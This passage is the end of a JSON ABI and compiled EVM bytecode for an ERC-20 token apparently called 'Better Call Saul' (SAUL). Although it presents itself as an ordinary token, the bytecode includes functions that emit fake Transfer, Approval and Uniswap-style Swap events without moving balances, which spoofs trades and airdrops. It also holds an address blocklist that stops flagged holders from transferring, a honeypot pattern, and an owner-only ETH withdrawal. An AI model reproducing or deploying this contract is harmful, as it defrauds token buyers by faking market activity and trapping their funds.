l"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526000600560006101000a81548160ff021916908315150217905550733fc91a3afd70395cd496c647d5a6cc9d4b2b7fad600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200013957600080fd5b506040518060400160405280601081526020017f4265747465722043616c6c205361756c000000000000000000000000000000008152506040518060400160405280600481526020017f5341554c00000000000000000000000000000000000000000000000000000000815250620001c6620001ba6200023360201b60201c565b6200023b60201b60201c565b8160069081620001d79190620006fa565b508060079081620001e99190620006fa565b5050506200022d3362000201620002ff60201b60201c565b600a6200020f919062000971565b64174876e800620002219190620009c2565b6200030860201b60201c565b62000af9565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200037a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003719062000a6e565b60405180910390fd5b6200038e600083836200047660201b60201c565b8060046000828254620003a2919062000a90565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000456919062000adc565b60405180910390a362000472600083836200047b60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200050257607f821691505b602082108103620005185762000517620004ba565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000543565b6200058e868362000543565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005db620005d5620005cf84620005a6565b620005b0565b620005a6565b9050919050565b6000819050919050565b620005f783620005ba565b6200060f6200060682620005e2565b84845462000550565b825550505050565b600090565b6200062662000617565b62000633818484620005ec565b505050565b5b818110156200065b576200064f6000826200061c565b60018101905062000639565b5050565b601f821115620006aa5762000674816200051e565b6200067f8462000533565b810160208510156200068f578190505b620006a76200069e8562000533565b83018262000638565b50505b505050565b600082821c905092915050565b6000620006cf60001984600802620006af565b1980831691505092915050565b6000620006ea8383620006bc565b9150826002028217905092915050565b620007058262000480565b67ffffffffffffffff8111156200072157620007206200048b565b5b6200072d8254620004e9565b6200073a8282856200065f565b600060209050601f8311600181146200077257600084156200075d578287015190505b620007698582620006dc565b865550620007d9565b601f19841662000782866200051e565b60005b82811015620007ac5784890151825560018201915060208501945060208101905062000785565b86831015620007cc5784890151620007c8601f891682620006bc565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200086f57808604811115620008475762000846620007e1565b5b6001851615620008575780820291505b8081029050620008678562000810565b945062000827565b94509492505050565b6000826200088a57600190506200095d565b816200089a57600090506200095d565b8160018114620008b35760028114620008be57620008f4565b60019150506200095d565b60ff841115620008d357620008d2620007e1565b5b8360020a915084821115620008ed57620008ec620007e1565b5b506200095d565b5060208310610133831016604e8410600b84101617156200092e5782820a905083811115620009285762000927620007e1565b5b6200095d565b6200093d84848460016200081d565b92509050818404811115620009575762000956620007e1565b5b81810290505b9392505050565b600060ff82169050919050565b60006200097e82620005a6565b91506200098b8362000964565b9250620009ba7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000878565b905092915050565b6000620009cf82620005a6565b9150620009dc83620005a6565b9250828202620009ec81620005a6565b9150828204841483151762000a065762000a05620007e1565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000a56601f8362000a0d565b915062000a638262000a1e565b602082019050919050565b6000602082019050818103600083015262000a898162000a47565b9050919050565b600062000a9d82620005a6565b915062000aaa83620005a6565b925082820190508082111562000ac55762000ac4620007e1565b5b92915050565b62000ad681620005a6565b82525050565b600060208201905062000af3600083018462000acb565b92915050565b6136f08062000b096000396000f3fe6080604052600436106101a05760003560e01c8063715018a6116100ec578063a9059cbb1161008a578063c78052c611610064578063c78052c6146105dc578063dd62ed3e146105f3578063f2fde38b14610630578063fb92b18014610659576101a7565b8063a9059cbb1461054d578063b79c48e51461058a578063beabacc8146105b3576101a7565b80638da5cb5b116100c65780638da5cb5b1461049157806395d89b41146104bc578063a1c617f5146104e7578063a457c2d714610510576101a7565b8063715018a61461042857806377a1736b1461043f5780637aac697b14610468576101a7565b806337c52806116101595780633e5beab9116101335780633e5beab91461035c578063477e19441461039957806370a08231146103c25780637111a994146103ff576101a7565b806337c52806146102cd57806338bf3cfa146102f6578063395093511461031f576101a7565b806306fdde03146101a9578063095ea7b3146101d457806318160ddd146102115780631d63c0931461023c57806323b872dd14610265578063313ce567146102a2576101a7565b366101a757005b005b3480156101b557600080fd5b506101be610682565b6040516101cb91906127cf565b60405180910390f35b3480156101e057600080fd5b506101fb60048036038101906101f6919061288f565b610714565b60405161020891906128ea565b60405180910390f35b34801561021d57600080fd5b50610226610737565b6040516102339190612914565b60405180910390f35b34801561024857600080fd5b50610263600480360381019061025e919061288f565b610741565b005b34801561027157600080fd5b5061028c6004803603810190610287919061292f565b610aa8565b60405161029991906128ea565b60405180910390f35b3480156102ae57600080fd5b506102b7610ad7565b6040516102c4919061299e565b60405180910390f35b3480156102d957600080fd5b506102f460048036038101906102ef9190612a74565b610ae0565b005b34801561030257600080fd5b5061031d60048036038101906103189190612af5565b610eeb565b005b34801561032b57600080fd5b506103466004803603810190610341919061288f565b610f37565b60405161035391906128ea565b60405180910390f35b34801561036857600080fd5b50610383600480360381019061037e9190612af5565b610f6e565b60405161039091906128ea565b60405180910390f35b3480156103a557600080fd5b506103c060048036038101906103bb9190612b22565b610fc4565b005b3480156103ce57600080fd5b506103e960048036038101906103e49190612af5565b611071565b6040516103f69190612914565b60405180910390f35b34801561040b57600080fd5b5061042660048036038101906104219190612b6f565b6110ba565b005b34801561043457600080fd5b5061043d6111b0565b005b34801561044b57600080fd5b5061046660048036038101906104619190612b22565b6111c4565b005b34801561047457600080fd5b5061048f600480360381019061048a9190612c23565b61134e565b005b34801561049d57600080fd5b506104a66114da565b6040516104b39190612ca6565b60405180910390f35b3480156104c857600080fd5b506104d1611503565b6040516104de91906127cf565b60405180910390f35b3480156104f357600080fd5b5061050e60048036038101906105099190612c23565b611595565b005b34801561051c57600080fd5b506105376004803603810190610532919061288f565b611720565b60405161054491906128ea565b60405180910390f35b34801561055957600080fd5b50610574600480360381019061056f919061288f565b611797565b60405161058191906128ea565b60405180910390f35b34801561059657600080fd5b506105b160048036038101906105ac919061288f565b6117ba565b005b3480156105bf57600080fd5b506105da60048036038101906105d5919061292f565b611ac5565b005b3480156105e857600080fd5b506105f1611b2f565b005b3480156105ff57600080fd5b5061061a60048036038101906106159190612cc1565b611b80565b6040516106279190612914565b60405180910390f35b34801561063c57600080fd5b5061065760048036038101906106529190612af5565b611c07565b005b34801561066557600080fd5b50610680600480360381019061067b9190612a74565b611c8a565b005b60606006805461069190612d30565b80601f01602080910402602001604051908101604052809291908181526020018280546106bd90612d30565b801561070a5780601f106106df5761010080835404028352916020019161070a565b820191906000526020600020905b8154815290600101906020018083116106ed57829003601f168201915b5050505050905090565b60008061071f612020565b905061072c818585612028565b600191505092915050565b6000600454905090565b6000600267ffffffffffffffff81111561075e5761075d612d61565b5b60405190808252806020026020018201604052801561078c5781602001602082028036833780820191505090505b50905030816000815181106107a4576107a3612d90565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561084b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061086f9190612dd4565b8160018151811061088357610882612d90565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506108f6600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166c0c9f2c9cd04674edea40000000610714565b50600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516109769190612914565b60405180910390a3600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947670de0b6b3a764000060008430426040518663ffffffff1660e01b81526004016109ea959493929190612f3f565b600060405180830381600087803b158015610a0457600080fd5b505af1158015610a18573d6000803e3d6000fd5b50505050600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610a9b9190612914565b60405180910390a3505050565b600080610ab3612020565b9050610ac08582856121f1565b610acb85858561227d565b60019150509392505050565b60006012905090565b6000600267ffffffffffffffff811115610afd57610afc612d61565b5b604051908082528060200260200182016040528015610b2b5781602001602082028036833780820191505090505b5090503081600081518110610b4357610b42612d90565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610bea573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c0e9190612dd4565b81600181518110610c2257610c21612d90565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050610c95600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166c0c9f2c9cd04674edea40000000610714565b5060005b85859050811015610ee357600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16868683818110610cf057610cef612d90565b5b9050602002016020810190610d059190612af5565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925868685818110610d4f57610d4e612d90565b5b90506020020135604051610d639190612914565b60405180910390a3600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947670de0b6b3a764000060008530426040518663ffffffff1660e01b8152600401610dd7959493929190612f3f565b600060405180830381600087803b158015610df157600080fd5b505af1158015610e05573d6000803e3d6000fd5b50505050600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16868683818110610e5557610e54612d90565b5b9050602002016020810190610e6a9190612af5565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef868685818110610eb457610eb3612d90565b5b90506020020135604051610ec89190612914565b60405180910390a38080610edb90612fc8565b915050610c99565b505050505050565b610ef36125f3565b80600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080610f42612020565b9050610f63818585610f548589611b80565b610f5e9190613010565b612028565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b610fcc6125f3565b60005b8282905081101561106c57600060026000858585818110610ff357610ff2612d90565b5b90506020020160208101906110089190612af5565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061106490612fc8565b915050610fcf565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60005b868690508110156111a7578484828181106110db576110da612d90565b5b90506020020160208101906110f09190612af5565b73ffffffffffffffffffffffffffffffffffffffff1687878381811061111957611118612d90565b5b905060200201602081019061112e9190612af5565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061117857611177612d90565b5b9050602002013560405161118c9190612914565b60405180910390a3808061119f90612fc8565b9150506110bd565b50505050505050565b6111b86125f3565b6111c26000612671565b565b6111cc6125f3565b60005b82829050811015611349576001600260008585858181106111f3576111f2612d90565b5b90506020020160208101906112089190612af5565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168383838181106112a5576112a4612d90565b5b90506020020160208101906112ba9190612af5565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92561132186868681811061130757611306612d90565b5b905060200201602081019061131c9190612af5565b611071565b60405161132e9190612914565b60405180910390a3808061134190612fc8565b9150506111cf565b505050565b60005b848490508110156114d35784848281811061136f5761136e612d90565b5b90506020020160208101906113849190612af5565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82260008686600060405161140a9493929190613044565b60405180910390a3600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1685858381811061145e5761145d612d90565b5b90506020020160208101906114739190612af5565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516114b89190612914565b60405180910390a380806114cb90612fc8565b915050611351565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606007805461151290612d30565b80601f016020809104026020016040519081016040528092919081815260200182805461153e90612d30565b801561158b5780601f106115605761010080835404028352916020019161158b565b820191906000526020600020905b81548152906001019060200180831161156e57829003601f168201915b5050505050905090565b60005b84849050811015611719578484828181106115b6576115b5612d90565b5b90506020020160208101906115cb9190612af5565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516116509493929190613089565b60405180910390a384848281811061166b5761166a612d90565b5b90506020020160208101906116809190612af5565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516116fe9190612914565b60405180910390a3808061171190612fc8565b915050611598565b5050505050565b60008061172b612020565b905060006117398286611b80565b90508381101561177e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161177590613140565b60405180910390fd5b61178b8286868403612028565b60019250505092915050565b6000806117a2612020565b90506117af81858561227d565b600191505092915050565b6000600267ffffffffffffffff8111156117d7576117d6612d61565b5b6040519080825280602002602001820160405280156118055781602001602082028036833780820191505090505b509050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611875573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906118999190612dd4565b816000815181106118ad576118ac612d90565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505030816001815181106118fc576118fb612d90565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc6127109081150290604051600060405180830381858888f193505050501580156119a0573d6000803e3d6000fd5b50600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac94761271060018487426040518663ffffffff1660e01b8152600401611a079594939291906131d6565b600060405180830381600087803b158015611a2157600080fd5b505af1158015611a35573d6000803e3d6000fd5b505050508273ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611ab89190612914565b60405180910390a3505050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611b229190612914565b60405180910390a3505050565b611b376125f3565b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611b7d573d6000803e3d6000fd5b50565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b611c0f6125f3565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611c7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c75906132a2565b60405180910390fd5b611c8781612671565b50565b6000600267ffffffffffffffff811115611ca757611ca6612d61565b5b604051908082528060200260200182016040528015611cd55781602001602082028036833780820191505090505b509050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611d45573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611d699190612dd4565b81600081518110611d7d57611d7c612d90565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250503081600181518110611dcc57611dcb612d90565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060005b8585905081101561201857600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc6127109081150290604051600060405180830381858888f19350505050158015611e7e573d6000803e3d6000fd5b50600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9476127106001858a8a87818110611ed657611ed5612d90565b5b9050602002016020810190611eeb9190612af5565b426040518663ffffffff1660e01b8152600401611f0c9594939291906131d6565b600060405180830381600087803b158015611f2657600080fd5b505af1158015611f3a573d6000803e3d6000fd5b50505050858582818110611f5157611f50612d90565b5b9050602002016020810190611f669190612af5565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef868685818110611fe957611fe8612d90565b5b90506020020135604051611ffd9190612914565b60405180910390a3808061201090612fc8565b915050611e09565b505050505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612097576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208e90613334565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612106576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120fd906133c6565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516121e49190612914565b60405180910390a3505050565b60006121fd8484611b80565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146122775781811015612269576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226090613432565b60405180910390fd5b6122768484848403612028565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036122ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122e3906134c4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361235b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161235290613556565b60405180910390fd5b612366838383612735565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156123ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123e4906135e8565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806125215750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561257d5760011515600560009054906101000a900460ff1615151461257c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125739061362e565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516125da9190612914565b60405180910390a36125ed84848461273a565b50505050565b6125fb612020565b73ffffffffffffffffffffffffffffffffffffffff166126196114da565b73ffffffffffffffffffffffffffffffffffffffff161461266f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126669061369a565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561277957808201518184015260208101905061275e565b60008484015250505050565b6000601f19601f8301169050919050565b60006127a18261273f565b6127ab818561274a565b93506127bb81856020860161275b565b6127c481612785565b840191505092915050565b600060208201905081810360008301526127e98184612796565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000612826826127fb565b9050919050565b6128368161281b565b811461284157600080fd5b50565b6000813590506128538161282d565b92915050565b6000819050919050565b61286c81612859565b811461287757600080fd5b50565b60008135905061288981612863565b92915050565b600080604083850312156128a6576128a56127f1565b5b60006128b485828601612844565b92505060206128c58582860161287a565b9150509250929050565b60008115159050919050565b6128e4816128cf565b82525050565b60006020820190506128ff60008301846128db565b92915050565b61290e81612859565b82525050565b60006020820190506129296000830184612905565b92915050565b600080600060608486031215612948576129476127f1565b5b600061295686828701612844565b935050602061296786828701612844565b92505060406129788682870161287a565b9150509250925092565b600060ff82169050919050565b61299881612982565b82525050565b60006020820190506129b3600083018461298f565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126129de576129dd6129b9565b5b8235905067ffffffffffffffff8111156129fb576129fa6129be565b5b602083019150836020820283011115612a1757612a166129c3565b5b9250929050565b60008083601f840112612a3457612a336129b9565b5b8235905067ffffffffffffffff811115612a5157612a506129be565b5b602083019150836020820283011115612a6d57612a6c6129c3565b5b9250929050565b60008060008060408587031215612a8e57612a8d6127f1565b5b600085013567ffffffffffffffff811115612aac57612aab6127f6565b5b612ab8878288016129c8565b9450945050602085013567ffffffffffffffff811115612adb57612ada6127f6565b5b612ae787828801612a1e565b925092505092959194509250565b600060208284031215612b0b57612b0a6127f1565b5b6000612b1984828501612844565b91505092915050565b60008060208385031215612b3957612b386127f1565b5b600083013567ffffffffffffffff811115612b5757612b566127f6565b5b612b63858286016129c8565b92509250509250929050565b60008060008060008060608789031215612b8c57612b8b6127f1565b5b600087013567ffffffffffffffff811115612baa57612ba96127f6565b5b612bb689828a016129c8565b9650965050602087013567ffffffffffffffff811115612bd957612bd86127f6565b5b612be589828a016129c8565b9450945050604087013567ffffffffffffffff811115612c0857612c076127f6565b5b612c1489828a01612a1e565b92509250509295509295509295565b60008060008060608587031215612c3d57612c3c6127f1565b5b600085013567ffffffffffffffff811115612c5b57612c5a6127f6565b5b612c67878288016129c8565b94509450506020612c7a8782880161287a565b9250506040612c8b8782880161287a565b91505092959194509250565b612ca08161281b565b82525050565b6000602082019050612cbb6000830184612c97565b92915050565b60008060408385031215612cd857612cd76127f1565b5b6000612ce685828601612844565b9250506020612cf785828601612844565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680612d4857607f821691505b602082108103612d5b57612d5a612d01565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050612dce8161282d565b92915050565b600060208284031215612dea57612de96127f1565b5b6000612df884828501612dbf565b91505092915050565b6000819050919050565b6000819050919050565b6000612e30612e2b612e2684612e01565b612e0b565b612859565b9050919050565b612e4081612e15565b82525050565b6000819050919050565b6000612e6b612e66612e6184612e46565b612e0b565b612859565b9050919050565b612e7b81612e50565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b612eb68161281b565b82525050565b6000612ec88383612ead565b60208301905092915050565b6000602082019050919050565b6000612eec82612e81565b612ef68185612e8c565b9350612f0183612e9d565b8060005b83811015612f32578151612f198882612ebc565b9750612f2483612ed4565b925050600181019050612f05565b5085935050505092915050565b600060a082019050612f546000830188612e37565b612f616020830187612e72565b8181036040830152612f738186612ee1565b9050612f826060830185612c97565b612f8f6080830184612905565b9695505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612fd382612859565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361300557613004612f99565b5b600182019050919050565b600061301b82612859565b915061302683612859565b925082820190508082111561303e5761303d612f99565b5b92915050565b60006080820190506130596000830187612e72565b6130666020830186612905565b6130736040830185612905565b6130806060830184612e72565b95945050505050565b600060808201905061309e6000830187612905565b6130ab6020830186612e72565b6130b86040830185612e72565b6130c56060830184612905565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061312a60258361274a565b9150613135826130ce565b604082019050919050565b600060208201905081810360008301526131598161311d565b9050919050565b6000819050919050565b600061318561318061317b84613160565b612e0b565b612859565b9050919050565b6131958161316a565b82525050565b6000819050919050565b60006131c06131bb6131b68461319b565b612e0b565b612859565b9050919050565b6131d0816131a5565b82525050565b600060a0820190506131eb600083018861318c565b6131f860208301876131c7565b818103604083015261320a8186612ee1565b90506132196060830185612c97565b6132266080830184612905565b9695505050505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061328c60268361274a565b915061329782613230565b604082019050919050565b600060208201905081810360008301526132bb8161327f565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061331e60248361274a565b9150613329826132c2565b604082019050919050565b6000602082019050818103600083015261334d81613311565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006133b060228361274a565b91506133bb82613354565b604082019050919050565b600060208201905081810360008301526133df816